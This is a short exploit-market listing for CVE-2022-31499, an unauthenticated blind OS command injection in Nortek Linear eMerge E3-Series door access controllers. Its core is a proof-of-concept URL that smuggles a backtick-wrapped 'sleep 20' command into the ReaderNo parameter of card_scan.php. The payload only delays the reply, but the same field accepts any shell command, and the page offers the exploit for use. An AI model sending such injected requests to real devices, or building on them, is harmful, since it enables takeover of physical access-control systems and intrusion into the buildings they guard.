[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Nortek Linear eMerge E3-Series Command Injection Vulnerability

Author
Omar Hashim
Risk
[
Security Risk High
]
0day-ID
0day-ID-37898
Category
web applications
Date add
08-08-2022
Platform
php
# Exploit Title: Nortek Linear eMerge E3-Series - Blind OS Command Injection
# Exploit Author: Omar Hashim
# Version: 0.32-09c
# Vendor home page: https://www.nortekcontrol.com/access-control/
# Vendor home page: https://linear-solutions.com/
# Authentication Required: No
# CVE: CVE-2022-31499

# POC:
 ====================

http:/<HOST:PORT>/card_scan.php?No=1337&ReaderNo=`sleep
20`&CardFormatNo=1337

#  0day.today [2024-12-25]  #